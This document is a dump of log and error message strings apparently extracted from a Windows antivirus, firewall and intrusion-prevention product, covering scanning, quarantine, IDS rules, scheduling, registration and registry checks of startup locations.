Unable to read Firewall Config information can't %s the Basic Firewall.
Updated HIPS Config information to %s the Firewall HIPS controller.
Updated WebFilter Config information to %s the Firewall WebFilter controller.
Updated Firewall Config information to %s the Firewall controller.
Failed to allocate the buffer for (%d) IDS items. Unable to read Firewall IDS Rules information.
SbFweIds_CreateUserIDSRule returned [%d]. Unable to create user IDS rule.
SbFweIds_UpdateUserIDSRule returned [%d]. Unable to create user IDS rule.
Called SbFweIds_GetDefinitionsRules with path (%s). The Firewall will now use the updated definition rules.
SbFweIds_GetDefinitionsRules failed with path (%s). The Firewall will not use the updated definition rules.
\idsrules.dat
No such data object stored for msgId %s. Cannot remove nor destroy the data object.
Removed the data object from the map for msgId %s.
Event signaled 0xX. Received the prompt answer for msgId %s. Returning answer in Result back to FW SDK.
Timeout while waiting for the prompt answer event 0xX for msgId %s. Allowing.
Error while waiting for the prompt answer event 0xX for msgId %s. Wait result %u.
Waiting for prompt answer event 0xX for msgId %s.
Event signaled 0xX. Received the prompt ACK for msgId %s. Prompt is being displayed to the user.
Timeout while waiting for the prompt ACK event 0xX for msgId %s. Maybe no clients. Allowing.
Error while waiting for the prompt ACK event 0xX for msgId %s. Wait result: %u.
Waiting for prompt ACK event 0xX for msgId %s.
Timeout while waiting for the data dequeue event 0xX for msgId %s. Allowing.
Failed to signal the dispatch event 0xX for msgId %s. Allowing.
Stored the data object in the map for msgId %s.
Prompt for outbound traffic for the any other app rule for known good app (%s); allow the event instead of prompting.
An error occurred trying to updated rule information in the config file for Rule Id (%d) from event related to application (%s).
Updated rule information saved in the config object for Rule Id (%d) from event related to application (%s).
Found an existing rule for application [%s] in the config object. Only changing the action enum for the application.
No existing Network or Application rule found for RuleID [%d], application [%s]. Creating a new Application rule with ID [%d].
Found an existing network rule for rule id [%d] in the config object. Only changing the action enum for the network rule.
We need to create rule for Rule ID [%d] related to application (%s).
Received a request to disable a rule for a (%s) event type.
Unable to read Firewall Config. Not able to disable the rule (ID %d).
Unable to create a new DisabledDefinitionIDSRule in the config object. DisabledDefinitionIDSRule for Rule Id (%d) was not saved to the config file.
Error saving the Firewall Config file. DisabledDefinitionIDSRule for Rule Id (%d) was not saved to the config file.
Found an existing DisabledDefinitionIDSRule for rule [%d] in the config object. No need to disable the rule.
DisabledDefinitionIDSRule saved in the config object for Rule Id (%d).
No existing DisabledDefinitionIDSRule found for rule [%d]. Creating a new DisabledDefinitionIDSRule.
Expecting an adapter event, but received a %s event. Not adding adapter or zone.
Unable to read Firewall Config. Not adding the adapter or zone to the collection for adapter (ID %s).
Unable to create a blank zone in the config object for adapter (ID %s). Not saving the added adapter.
Zone not found in config object for adapter (ID %s). Adding a new zone to the collection.
Unable to create a blank adapter (ID %s) in the config object. Not adding zone either.
Adapter not found in config object. Adding a new adapter (ID %s) to the collection.
Adapter found in config object for adapter (ID %s).
Received a request to disable the notifications for (%s) event type.
Unknown request enum (%d). Cannot figure out request.
Received a request from a client in response to a Firewall event, but we are unable to serialize the event xml data.Cannot figure out request.
sbpimsvc.exe
sbamui.exe
Added default application rule for SBAgentDiagnosticTool.EXE to firewall configuration.
Invalid hour %u. There are only 24 hours in a day. Did not accumulate network statistics.
%s\%sNS_%s.xml
network hourly stats file
Invalid hour %u. There are only 24 hours in a day. Did not accumulate IDS statistics.
%s\%sIS_%s.xml
IDS hourly stats file
Invalid hour %u. There are only 24 hours in a day. Did not accumulate Filter statistics.
%s\%sFS_%s.xml
Filter hourly stats file
More items on the event dispatch queue so NOT resetting the dispatch event. Keep processing more messages until the queue is empty. Queue size = %d.
Failed to reset the event dispatch event (0xX).
Resetting the dispatch event because the queue is empty. This will allow this thread to wait for the next event. Queue size = %d.
Finished processing the event and determining if we need to reset the dispatch event. Only reset it if the queue is empty. Queue size = %d.
No listeners for Reporting event for msgId %s. The COM event to notify any interested client apps of a firewall report event was NOT fired.
Calling OnReportingEvent() for msgId %s. This is the COM event to notify any interested client apps of a firewall report event.
%s\%s%s.xml
Invalid or unknown ClientRuleData value for event type (%s). Unable to determine which list of event files to pass to ManageEventFiles.
%s%s.xml
FWPORT
No client apps listening for Publishing event for msgId %s. The user will not receive any pop up for this event.
Calling OnPublishingEvent() for msgId %s. The COM event is being fired to alert any listening clients of the event that is ready for publishing.
Failed to signal the data dequeued event 0xX for msgId %s.
Event signaled, handle = 0xX. Dequeued and dispatching the queued firewall event for msgId %s. Signaling the data dequeued event so the firewall SDK callback can return, handle = 0xX.
While dequeueing the data object for dispatch for msgId %s, found an uknown event type (%d). Whatever event caused this to occur is discarded.
Failed to reset the stats dispatch event (0xX).
Event signaled 0xX. Dispatch the queued firewall stats.
Error while waiting for dispatch event 0xX. Wait result: %u.
Waiting for dispatch event 0xX and 0xX.
Out. Firewall status = %u
In. Firewall status = %u
Failed to signal the prompt answer event 0xX for msgId %s.
Signaling the prompt answer event 0xX for msgId %s.
No such data object stored for msgId %s. Not found. Not sending the answer to the prompt to the Firewall SDK.
No such data object stored for msgId %s. iter->second was NULL. Not sending the answer to the prompt to the Firewall SDK.
Saving the prompt answer for msgId %s in the map.
Received prompt answer for msgId %s.
Failed to signal prompt ACK event 0xX for msgId %s.
Signaling prompt ACK event 0xX for msgId %s.
No such data object queued for msgId %s. Not found. Not signaling prompt ACK.
No such data object stored for msgId %s. iter->second was NULL. Not signaling prompt ACK.
Received prompt ACK for msgId %s.
Failed starting the event dispatcher thread. Firewall will not be operational.
Failed creating the dispatch the firewall stats...event. Event dispatcher thread start failed.
Failed creating the dispatch the firewall event...event. Event dispatcher thread start failed.
This %s a Firewall SKU and the Firewall dll was successfully loaded.
This %s a Firewall SKU but we could not load Firewall dll, the controller will not be started.
Unable to get the Enterprise Agent (%s) start function (%s) address. Unable to stop the Enterprise Agent.
Enterprise Agent (%s) start function (%s) returned %s.
Calling the Enterprise Agent (%s) start function (%s).
SBEAgent.dll
Unable to get the Enterprise Agent (%s) stop function (%s) address. Unable to stop the Enterprise Agent.
Calling the Enterprise Agent (%s) stop function (%s).
Unable to get the Enterprise Agent (%s) reset firwall function (%s) address. Unable to reset the firewall.
Calling the Enterprise Agent (%s) reset firewall to policy function (%s).
CProxy_ISBHIPSEvents<class CSBHIPS>::Fire_HIPSReportingCB
CSBHIPS::OnReportingEvent
Unexpected result=<%d> waiting for worker thread to stop; worker thread will be terminated
Resetting all HIPS settings back to the default settings for (%s) mode.
HIPSConfig.xml
Added program=<%s>, md5=<%s>, authority=<%s>, protection=<%s>
Failed to add program=<%s>, md5=<%s>, authority=<%s>, protection=<%s>
Couldn't compute the MD5 for program=<%s> with authority=<%s>; error=<%d>. May not be able to add it to HIPS.
ApplyConfig %s; PrevState=<%s>, State=<%s>
Unable to read HIPS Config information can't %s the Firewall HIPS.
Invalid hour %u. There are only 24 hours in a day. Did not accumulate HIPS statistics.
%s\%sHS_%s.xml
hips hourly stats file
Processed %d event(s) from the queue
There was an error adding to the HIPS Hourly Stats buckets. This HIPS event may not have been added to the stats correctly.
No listeners for Publishing/Reporting events
Firing Publishing/Reporting events
HIPS{%s}.xml
Unexpected result=<%d> waiting for controller events; ignore it
Got current thread state <%d> and reboot <%d> statuses.
Boot time scanner REGISTRATION <%s>.
Boot time scanner UNREGISTRATION <%s>.
Couldn't get boot time scanner status. Operation failed.
Current boot time scanner registration status is <%s>.
Threat engine returned an unsupported state: %d. Scan state event won't fire event to subscribed clients.
Scan thread change to <%d> state.
Failed scanning file <%s>. Didn't get any result.
File <%s> has threat id <%d> (0 - not a threat).
File <%s> %s good.
Invalid source buffer pointer or length. Write file operation failed.
Couldn't open file on path <%s>. Write file operation failed.
Failed writing data into file path <%s>. Write file operation failed.
Unexpected length <%d> written into file pat <%s>. Write file operation failed, file incomplete.
Data completely written into file <%s>.
File successfully opened on path <%s> to write data.
Couldn't open file path <%s>. Couldn't read file.
Read data of length <%d> from file on path <%s>.
Failed reading data from file on path <%s>. Couldn't read file.
Failed reading BOM from file path <%s>. Couldn't read file.
Successfully retrieved file length <%d>.
File successfully opened on path <%s> to read data.
Invalid file length <%s>. Couldn't read file.
Last successful scan results path generated <%s>.
Couldn't get signature for file <%s> from threat engine.
Threat Engine returned (%s) signature for file <%s> from threat engine.
Failed to purge history because this is an unknown history type %d.
File <%s> deleted since it's older than <%d> days.
Could not delete file on path <%s>. Search for the next history file.
Delete history events for (%s) older than <%d> days.
SW*.xml
LG*.xml
FWCHG*.xml
FWPUP*.xml
FWADP*.xml
FWIDS*.xml
FWADV*.xml
FWNET*.xml
Port Events
FWPORT*.xml
FWAPP*.xml
HIPS*.xml
FW*.xml
Web Filter Events
WF*.xml
FW Hourly Stats
*.xml
Deleting quarantine items older than <%d> days.
EV*.xml
EM*.xml
2*.xml
Delete is enabled. HistoryType=[%d]
Delete is disabled. HistoryType=[%d]
Firing the cleaner control <%s> using <%s> as the input file.
Cleaner input file moved from <%s> to <%s>.
Failed copying file from <%s> to <%s>. Cleaning operatation won't proceed.
Got input scan results file name the cleaner will use <%s>.
Checking for a user known entity [%s] and signature [%s].
Unknown trace type detected iuTraceType=[%d].
Scan thread resumed to previous <%d> state.
Non-cookie trace from <%s> was deleted or quarantined. Send it to threat net.
Cleaner results <%s> didn't meet criteria. File NOT sent to threat net.
Got trace <%s> of threat <%s> from <%s>. Test if there are non-cookie threats deleted or quarantined.
Got threat <%s> from <%s>. Test if there are non-cookie threats deleted or quarantined.
Threats from <%s> were quarantined or deleted. Proceed calculating criteria.
Successfully got cleaner results summary from <%s>. Proceed calculating criteria.
Couldn't deserialize scan results <%s>. Clean ends and thread waits for next event.
Cleaner results <%s> %s meet deep after quick criteria.
Got trace <%s> of threat <%s> from <%s>. Test if there are non-cookie threats.
Got threat <%s> level [%d] from <%s>. Test if there are non-cookie threats.
Threats from <%s> were detected. Proceed checking criteria.
Successfully got cleaner results summary from <%s>. Proceed checking deep after quick criteria.
Couldn't deserialize scan results <%s>. Thread waits for next event.
Scan results criteria applied successfully to <%s>.
Couldn't apply scan results criteria successfully to <%s>. Clean ends and thread waits next event.
Wrote cleaner results file on path <%s> successfully.
Couldn't write clean results file on path <%s>. Clean ends and thread waits next event.
Got cleaner results lenght <%d> on path <%s>
Cleaner operation completed successfully.
Cleaner returns unknown state <%d>. Clean ends and thread waits for the next event.
Scan results data on path <%s> successfully read.
Couldn't read scan results data on path <%s>. Clean ends and thread waits for next event.
Got scan results file size of length <%d> on path <%s> successfully.
Coulnd't read scan results size on path <%s>. Clean ends and thread waits for next event.
Current clean input file on path <%s>.
CSBScanControlImpl::ExecuteCleaner
Couldn't serialize default scan config file on path <%s>. Serialize operation failed.
Threat engine max <%d> and min <%d> file lengths.
Default quarantine folder path <%s>.
Default system events folder path <%s>.
Default history folder path <%s>.
Couldn't serialize scan config file path <%s>. Config file may not exist or is corrupted, it will try to create a default scan config file. Will try to create a default scan config file.
ScanConfig.xml
Scan type <%d> %s found.
Couldn't get scan config object. Operation failed.
Adding the randomized scheduled definitions update before the next scheduled scan for (%s) failed. Scheduled update before the next scheduled scan will not occur.
d:d
Randomized the scheduled definitions update before the next scheduled scan by [%d] seconds to (%s).
Current time is (%s).
Couldn't get application data folder <%s>. Unable to convert any user knowns by signature, crc8 to fullpath.
Couldn't find scan schedule <%d>; unable to determine scan type.
Scan configuration name <%d> is invalid OR empty. Scan thread won't start a scan.
Scan config <%d> is valid. Scan thread is starting a scan now.
Couldn't delete Social Watch history older than [%d] days. Wait for the next event.
Couldn't delete System Update Scan history older than [%d] days. Wait for the next event.
Couldn't delete hips event files older than [%d] days. Wait for the next event.
Couldn't delete webfilter event files older than [%d] days. Wait for the next event.
Couldn't delete firewall event files older than [%d] days. Wait for the next event.
Couldn't delete firewall stats files older than [%d] days. Wait for the next event.
Couldn't delete quarantined files older than [%d] days. Wait for the next event.
Couldn't delete system events events older than [%d] days. Wait for the next event.
Couldn't delete EmailAV events older than [%d] days. Wait for the next event.
Couldn't delete AP events older than [%d] days. Wait for the next event.
Couldn't delete Scan history older than [%d] days. Wait for the next event.
Couldn't set scheduled scan <%s> for scan type <%d>. This scheduled scan will not happen.
Successfully set scheduled scan <%s> for scan type <%d>.
Invalid cleanerAction=<%d> (categoryName=<%s>, categoryId=<%d>). Threat category action was not pushed into the threat engine.
Threat categoryName=<%s>, categoryId=<%d>, and cleanerAction=<%d> added to threat engine.
Failed adding threat categoryName=<%s>, categoryId=<%d>, and cleanerAction=<%d> to threat engine. Threat category action was not pushed into the threat engine.
Invalid categoryId=<%d> (categoryName=<%s>, cleanerAction=<%d>). Threat category action was not pushed into the threat engine.
Couldn't add threat id to ignore list <%d>. One or more ignored threat was not pushed into the threat engine.
Threat id added to ignore list <%d>.
Failed setting SBCSEnableRootkitEngine <%d>. Value may be incorrect in the threat engine.
Failed setting SBCSSetLowRiskThreatDetection <%d>. Value may be incorrect in the threat engine.
Couldn't get application data folder <%s>. It won't set new content for scan config file.
Scan config data %ssaved.
Scan config data %s saved.
Saved current total scan elapsed time of <%u> seconds.
Add a user known entity [%s] of type %d to scan config. Item Type is %d.
Adding file [%s] to known good because MoveToAlwaysAllowed is true.
Removing known bad file [%s] from Always Blocked list.
Moving file [%s] from Always Blocked list to Always Allowed list.
Couldn't exclude path <%s> from scan. Leaving now.
Scan settings for type <%d> successfully applied to the threat engine.
User has invalid or expired registration state.Disabling the auto disposition.
Added path <%s> to scan.
Failed setting EnableFileCache to <%s>; scan will NOT use file cache.
Set EnableFileCache to <%s>; scan %s use file cache.
Set SBCS_OPT_SCAN_ROOTKITS to <%d>.
Failed setting SBCS_OPT_SCAN_ROOTKITS <%d>. Leaving now.
Set SBCS_OPT_SCAN_VIPRE_SUSPICIOUS to <%d>.
Failed setting SBCS_OPT_SCAN_VIPRE_SUSPICIOUS <%d>. Leaving now.
Set SBCS_OPT_SUSPEND_ACTIVE_THREATS to <%d>.
Failed setting SBCS_OPT_SUSPEND_ACTIVE_THREATS <%d>. Leaving now.
Set SBCS_OPT_SCAN_REGISTRY to <%d>.
Failed setting SBCS_OPT_SCAN_REGISTRY <%d>. Leaving now.
Set SBCS_OPT_SCAN_PROCESSES_DEEP to <%d>.
Failed setting SBCS_OPT_SCAN_PROCESSES_DEEP <%d>. Leaving now.
Set SBCS_OPT_SCAN_PROCESSES to <%d>.
Failed setting SBCS_OPT_SCAN_PROCESSES <%d>. Leaving now.
Set SBCS_OPT_SCAN_KNOWN_FILE_TYPES_ONLY to <%d>.
Failed setting SBCS_OPT_SCAN_KNOWN_FILE_TYPES_ONLY <%d>. Leaving now.
Set SBCS_OPT_SCAN_FILES to <%d>.
Failed setting SBCS_OPT_SCAN_FILES <%d>. Leaving now.
Set SBCS_OPT_SCAN_FILENAME_AND_CHECKSUM to <%d>.
Failed setting SBCS_OPT_SCAN_FILENAME_AND_CHECKSUM <%d>. Leaving now.
Set SBCS_OPT_SCAN_DONT_CALC_CHECKSUM to <%d>.
Failed setting SBCS_OPT_SCAN_DONT_CALC_CHECKSUM <%d>. Leaving now.
Set SBCS_OPT_SCAN_DERIVATIVES to <%d>.
Failed setting SBCS_OPT_SCAN_DERIVATIVES <%d>. Leaving now.
set SBCS_OPT_SCAN_COOKIES to <%d>
Failed setting SBCS_OPT_SCAN_COOKIES <%d>. Leaving now.
Set SBCS_OPT_SCAN_COMMON_TACTICS to <%d>.
Failed setting SBCS_OPT_SCAN_COMMON_TACTICS <%d>. Leaving now.
Set SBCS_OPT_SCAN_ARCHIVES to <%d>.
Failed setting SBCS_OPT_SCAN_ARCHIVES <%d>. Leaving now.
Set SBCS_OPT_SCAN_ALL_USERS to <%d>.
Failed setting SBCS_OPT_SCAN_ALL_USERS <%d>. Leaving now.
Set SBCS_OPT_EXCLUDE_REMOVABLE_DRIVES to <%d>.
Failed setting SBCS_OPT_EXCLUDE_REMOVABLE_DRIVES <%d>. Leaving now.
Set SBCS_OPT_SCAN_ALL_LOCAL_DRIVES to <%d>.
Failed setting SBCS_OPT_SCAN_ALL_LOCAL_DRIVES <%d>. Leaving now.
Set SBCS_OPT_RECURSIVE_FILE_SCAN to <%d>.
Failed setting SBCS_OPT_RECURSIVE_FILE_SCAN <%d>. Leaving now.
Set SBCS_OPT_KEEP_SCAN_RECORD to <%d>.
Failed setting SBCS_OPT_KEEP_SCAN_RECORD <%d>. Leaving now.
Thread priority successfully set to <%d>.
Failed setting thread priority to <%d>. Still applying other settings.
Scan type <%d> successfully applied to Threat Engine.
Couldn't set scan description <%s>. Still applying other settings to Threat Engine.
%d - %s, %d - %s
Found settings for scan type <%d>.
Did not find scan schedule to get scan settings from for this Scheduled Custom Scan <%d>. Leaving now.
Did not find settings for scan type <%d>. Leaving now.
Set SBCSSetLowRiskThreatDetection() to <%s>.
Failed setting SBCSSetLowRiskThreatDetection(<%s>). Value may be incorrect in the threat engine.
%s initialized loop. Scan will %s
Removing missed scheduled scan item after its timer was fired. Scan name [%s], Id [%d], start time [%s].
Looking for missed scheduled scan items to remove. Scan name [%s], Id [%d], start time [%s], now [%s].
Scanner returned unknown state <%d>. Scan ends and thread waits for the next event.
Scan executed successfully, user feedback is expected.
A scan was executed successfully and no threats were found. Performing the clean to set the clean results and fire the appropriate events.
The system is configued to perform cleaning without user dispositioning of threats found. Results file is <%s>.
Last scan type <%d> SAVED. Wait for the next event.
Couldn't save last scan type <%d>. Wait for the next event.
Config data for scan type <%d> SAVED. Wait for the next event.
Couldn't save config data for scan type <%d>. Wait for the next event.
Saved scan results file <%s>.
Couldn't save scan results into <%s>. Scan ends and thread waits for the next event.
%Y%m%d%H%M%S.xml
Config data for the next scheduled scan date/time SAVED. Proceed with scan operation.
Couldn't save the next scheduled scan date/time. Proceed with scan operation.
CSBScanControlImpl::ExecuteScanner
Added a new missed scheduled scan to the schedules collection with start time of [%s]. Persisting silently to the scan config file.
Last scheduled scan was missed, schedule a one time scan in %d minutes.
We missed a scheduled scan. The action to take is %d.
Checking to see if we missed a scheduled scan. Next scheduled scan is [%s].
Thread initialization failed. Cannot execute clean, will wait for the next one.
It's NOT valid to execute a clean operation, but no threats were found. Proceed with cleaning process in order to advance the state of the scan controller.
It's VALID to execute a clean operation. Proceed with cleaning process.
It's INVALID to executed a clean operation. Abort the cleaning process.
Unexpected scan type [%d] updating system event log. Will wait for the next event.
Thread initialization failed. Cannot execute scan, will wait for the next one.
Scan thread is waiting for event, current state is <%d>.
Couldn't create scan thread, scan operations will not happen.
Pre-loop actions executed successfully. Procced with scan thread execution.
Failed executing action taken BEFORE starting loop. Scan thread will end now.
Scan thread already running. Leaving operation now!
%s:%s
SBWinHttp
Failed opening session with proxy: proxy server=%s
SBWinHttp::CSBWinHttpSession::Initialize
Opened session with proxy: proxy server=%s
Failed opening connection: server=%s, port=%d
SBWinHttp::CSBWinHttpConnection::Initialize
Opened connection: server=%s, port=%d
Got unexpected WINHTTP_CALLBACK_STATUS_xxx. Status code: %d
Got WINHTTP_CALLBACK_STATUS_REQUEST_ERROR. dwResult=%d dwError=%d
OnReadComplete returned: %d
Completed sending request. WinHttpReceiveResponse returned error: %d
Error after sending request. OnWriteDAta returned: %d
SBWinHttp::CSBWinHttpRequest<class SBWinHttp::CSBTransferBufferRequest>::OnCallback
Request returned %d
Unable to send the user credentials to the Web service.
WinHttpSetCredentials failed GetLastError returned [%d].
Request returned HTTP_STATUS_PROXY_AUTH_REQ.
Request returned HTTP_STATUS_NOT_FOUND.
Request returned HTTP_STATUS_BAD_REQUEST.
Request returned HTTP_STATUS_SERVICE_UNAVILABLE
SBWinHttp::CSBWinHttpRequest<class SBWinHttp::CSBTransferBufferRequest>::OnHeadersAvailable
VIPREHttpServer::CSBHttpMonitor::SendHttpResponse
HttpSendHttpResponse failed with %lu
HttpReceiveRequestEntityBody failed with %lu
VIPREHttpServer::CSBHttpMonitor::SendHttpPostResponse
VIPREHttpServer::CSBHttpMonitor::DoReceiveRequests
[Error %u, %s].
%s\%s*.csv
%s%s_%d.csv
d-d-d d:d:d
\\.\root\SecurityCenter
pathToSignedProductExe
FirewallProduct.instanceGuid="
AntiVirusProduct.instanceGuid="
AntiSpywareProduct.instanceGuid="
Cancelled waitable timer for item <%d>.
Cancel of waitable timer failed for item <%d>. Timer may still be set.
Deleting schedule item <%d> object.
Closing timer handle 0xX.
Sun - Sat [%d, %d, %d, %d, %d, %d, %d]
Created waitable timer; handle 0xX.
Waitable timer already exists; here is the handle 0xX.
Setting waitable timer for %I64d 100 nano second units in the future which is %s (local time).
Randomizing timer by %I64u 100ns units, %d seconds.
Scheduling item <%d> for %s. Time d:d, Day %s, Days: %s.
Looking for next week schedule items. Checking schedule item <%d>. Time d:d, Days: %s.
Deleting expired one time schedule. Schedule item <%d>. Time d:d, Days: %s.
Looking for this week schedule items. Checking schedule item <%d>. Time d:d, Days: %s.
Looking for next schedule item. Today is %s. Day of week as int = %d.
%m/%d/%y Day %A, %H:%M.
Potentially too small of a repeat interval caused adding of max number of schedules. Truncating to max schedules. Repeat interval %d minutes.
Added schedule item <%d> object. Start d:d.
Malformed stop time passed in <%s>. Rejecting this schedule.
Malformed time passed in <%s>. Rejecting this schedule.
Maximum count [50] of scheduled items exceeded for itemData <%d>. Rejecting this schedule.
Added schedule item <%d> object.
okernel32.dll
Unable to locate the WDStatus and WDEnable functions in the MPClient.dll.
Request to (%s) Defender failed hr = <%x>.
Request to (%s) Defender processed successfully.
Request was to (%s) and Defender is already (%s).
Load of MPClient.dll failed. Defender not installed on this system.
\Windows Defender\MpClient.dll
Invalid source buffer pSourceBuff=[0x%x], dwSourceLen=[%d]. Crypt will abort now.
Invalid target buffer pTargetBuff=[0x%x], pdwTargetLen=[0x%x]. Crypt will abort now.
There is no valid key handle=[0x%x]. Crypt will abort now.
There is no valid key string set. Crypt will abort now.
Couldn't encrypt/decrypt data using key=[%s]. Crypt failed.
Couldn't create block cypher session basd on hash of key=[%s]. Crypt will abort now.
Couldn't populate cryptographic hash object using key=[%s]. Crypt will abort now.
Invalid target buffer ppTargetBuff=[0x%x], pdwTargetLen=[%d]. Crypt will abort now.
Successfully retrieved file size <%d>.
Got source data <0x%x> and size <%d> from path <%s> successfully.
Coulnd't read file size on path <%s>. Crypt will abort now.
Invalid source path string length=[%d]. Crypt will abort now.
Wrote all data into file <%s>.
Unexpected size written into file %s.
Failed writing data into file %s.
Couldn't open file %s.
Could not write RegInfo registry key, error [%ld].
Could not open SBAMSvc registry key, error [%ld].
SKMSRegistration::WriteRegistrationKeyToRegistry
Could not open HKLM\Software registry key.
Could not read RegInfo registry key.
SKMSRegistration::ReadRegistrationKeyFromRegistry
Could not open HKLM\Software\SBAMSvc registry key.
Could not read MachineGuid registry key.
Could not open HKLM\Software\Microsoft\Cryptography registry key.
InstallEXEName
InternetReadFile successful. SKMS Return Value = %s.
Error getting SKMS status code from skms. Registration key will not be able to be verified.
Error getting install date from SBAMConfig.bin
Error writting install date to SBAMConfig.bin
Invalid date from SBAMConfig.bin
Error getting data from SBAMConfig.bin. Date is in the future, resetting to now.
SBAMConfig.bin exists
Query for operating system name failed.
Failed to Create the Web Object
Error getting SKMS status code from skms, it return an empty string. Registration key will not be able to be verified.
Unique Key = %s
Validating Registration Code: %s
Didn't receive a registration key from SKMS. Will try again on next attempt.
The Registration code returned by SKMS did not validate as a registration key. This data will not be used.
Request to SKMS for a trial key returned success, will attempt to validate that this looks like a valid key. SKMS Returned = (%s).
The request to SKMS was unable to AutoGet Registration key. Will try again on next attempt.
SKMSRegistration::AutoGetRegistrationKey
?KEYVALUE=
kbu.dat
Proxy is enabled, using server name (%s).
WinHttpOpen failed error [%d]. Proxy server name is (%s). Returning false.
Leaving SBInternetAccess after WinHttpOpen returning false.
WinHttpOpen returned valid handle, checking request url <%s>.
hXXps://
Invalid RequestURL (%s) unable to retrieve server name.
Invalid RequestURL (%s) unable to retrieve application request name.
WinHttpConnect to <%s> failed error [%d]. Request not performed.
Leaving SBInternetAccess after WinHttpConnect returning false.
WinHttpConnect to <%s> successful.
WinHttpOpenRequest of <%s> failed error [%d]. Request not performed.
Leaving SBInternetAccess after WinHttpOpenRequest returning false.
WinHttpOpenRequest <%s> successful.
WinHttpSendRequest returned [%s] GetLastError returned [%d].
WinHttpReceiveResponse returned [%s] GetLastError returned [%d].
error = ERROR_WINHTTP_RESEND_REQUEST, so resending request...
A WinHttp* call returned an error, GetLastError returned [%d].
WinHttpQueryHeaders returned [%s].
Received HTTP_STATUS_SERVICE_UNAVAIL response to WinHttpQueryHeaders.
Received HTTP_STATUS_OK response to WinHttpQueryHeaders.
Received HTTP_STATUS_PROXY_AUTH_REQ response to WinHttpQueryHeaders. The proxy requires authentication. Sending credentials.
GetLastError = [%d] calling WinHttpQueryAuthSchemes during Proxy Authentication processing.
Status code [%d] returned from WinHttpQueryHeaders while reading response from web service.
WinHttpQueryHeaders returned status [%d], GetLastError = [%d]
WinHttpQueryDataAvailable returned [%d] bytes available to read.
Reading the data into file <%s>.
WinHttpReadData() error <%d>. Download not completed successfully.
Open of download file <%s> failed with error [%d]. Download not performed.
Closed download file, [%d] total bytes downloaded.
Returning buffer data (%S).
Progress call back indicated cancel download. Deleting partial download file <%s>.
Caught an exception error [%d] trying to get data from internet. Request not performed.
Leaving SBInternetAccess returning [%s].
Request URL is empty. Unable to request data from internet server.
SBAMInternetAccess::SBPostURLReadResult
SBPostURLReadResult Request URL is (%s).
SBAMInternetAccess::SBPostURLSaveToFile
Request URL is empty. Cannot request data from internet server.
SBPostURLSaveToFile Request URL is (%s).
z:\lmx\sw\lmx-0050\lmxparse.h
lmxparse.cpp
l_event != EXE_UNKNOWN
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
w.bat
WUSER32.DLL
!#%*,/:;?@[]__{{}}
!#%'**,,./:;?@\\
$$  <>^^``||~~
  <>||~~
tnft_temp.zip
hXXp://dbteam_testbox/ThreatNetResTService/SendFileService.svc/ThreatNetTransferFile?
sFilePath: <%s>; sURL: <%s>; sPassword: <%s>
Error deleting zip file: <%s>
File <%s> is too large to transfer to ThreatNet. Unable to transfer file to Threatnet.
COM error: <0xx> Description: <%s>.
Args: sFilePath: <%s>; sURL: <%s>; sPassword: <%s>
Error %d. Unable to open file: <%s>. File(s) will not be transfered to ThreatNet
GetZipFile Args: sZipPathFileName: <%s>; iFileLength: <%d>
COM error: <0xx> Description: <%s>. Unable to transfer file to ThreatNet.
Xceed error: <%d>. Unable to transfer file to ThreatNet.
ZipFiles Args: sBasePath: <%s>; sFilesToProcess: <%s>; sZipPathFileName: <%s>; sPassword: <%s>
The file is read only. Unable change file attributes for %s <%s>.
Error saving %s <%s>--%s
Failed to save %s <%s>.
Bad argument; pFilePath is NULL. %s.
Error reading %s <%s>--%s
Failed to read %s <%s>.
r4.0.0
Couldn't resolve path=<%s>.
Couldn't get file info from path=<%s>. Go to next item.
Couldn't get value from [hive:key:value]=[0x%x:%s:%s]. Leave now.
Couldn't resolve path=<%s>. Go to next item.
Got valid class path [%s] from [hive:key:value]=[0x%x:%s:%s].
Couldn't traverse for SUBKEYS under [hive:key]=[0x%x:%s]. Proceed normally.
Couldn't traverse for VALUES under [hive:key]=[0x%x:%s]. Proceed normally.
Couldn't access subkeys nor values under registry location [hive:key]=[0x%x:%s]. Returning now.
Couldn't find any ClsIds on registry location [hive:key]=[0x%x:%s]. Returning now.
Couldn't get path from ClsId=<%s>. Go to next item.
No Clsid paths were found under [hive:key]=[0x%x:%s].
Got Clsid paths under [hive:key]=[0x%x:%s] successfully.
Couldn't traverse for ClsId paths under [hive:key]=[0x%x:%s]. Returning now.
Couldn't resolve path=<%s>. Proceed normally.
Couldn't get file info from path=<%s>. Proceed normally.
No Clsid info were found under [hive:key]=[0x%x:%s].
Got Clsid info objects under [hive:key]=[0x%x:%s] successfully.
software\microsoft\windows\currentversion\explorer\browser helper objects
Couldn't get the BHOs under HKEY_LOCAL_MACHINE.
Couldn't get the BHOs under HKEY_CURRENT_USER.
%sClsIds were found under the BHO registry location.
Couldn't get ActiveX objects under HKEY_LOCAL_MACHINE.
Couldn't get ActiveX objects under HKEY_CURRENT_USER.
%sClsIds were found under the Active X registry location.
software\microsoft\windows\currentversion\explorer\shellexecutehooks
Couldn't get ShellExecHooks under HKEY_LOCAL_MACHINE.
CSBExplorer::GetShellExecHookColl
Couldn't get ShellExecHooks under HKEY_CURRENT_USER.
%sClsIds were found under the windows shell execute registry location.
Couldn't get Shell Execution Hooks.
CSBExplorer::GetShellExecHooks
Got info from no Shell Execution Hook.
Got all Shell Execution Hooks info successfully.
Couldn't get ip address from input string [%s].
Couldn't get host information from Ip address [%s].
There is no server name for Ip address [%s].
Buffer for host name is not big enough iLen=[%d], strRemoteHost=[%s].
It failed in getting info from file path [%s]. Leave now.
Couldn't get host name from ip address [%s]. Go to next item.
GetModuleFileNameEx failed [%u]
Invalid start up type eType=[%d].
Couldn't get list of files under path=[%s].
desktop.ini
Couldn't get shortcut info path=[%s] or it's not a shortcut. Proceed normally.
Couldn't resolve path to file pointer by shortcut path=[%s]. Go to next file.
Couldn't get file info path=[%s]. Proceed normally.
software\microsoft\windows\currentversion\run
Invalid start up type eType=[%d].Leave now.
Registry location empty eType=[%d]. Leave now.
Couldn't get file path from command strCmd=[%s].Go to command.
Couldn't get file info path=[%s].Proceed normally.
software\microsoft\windows nt\currentversion\winlogon
Invalid start up type eType=[%d]. Leave now.
Got empty string on registry location [hive:key:value]=[0x%x:%s:%s]. Leave now.
Couldn't get file path from registry location [hive:key:value]=[0x%x:%s:%s]. Go to next item.
Couldn't resolve path to file path=[%s]. Go to next item.
There is no Windows logon to get info from.
Got info from all Windows logon programs successfully.
Couldn't find host file on location paht=[%s].
Successfully got path to host file paht=[%s].
Couldn't open hosts file on path=[%s]. Leave now
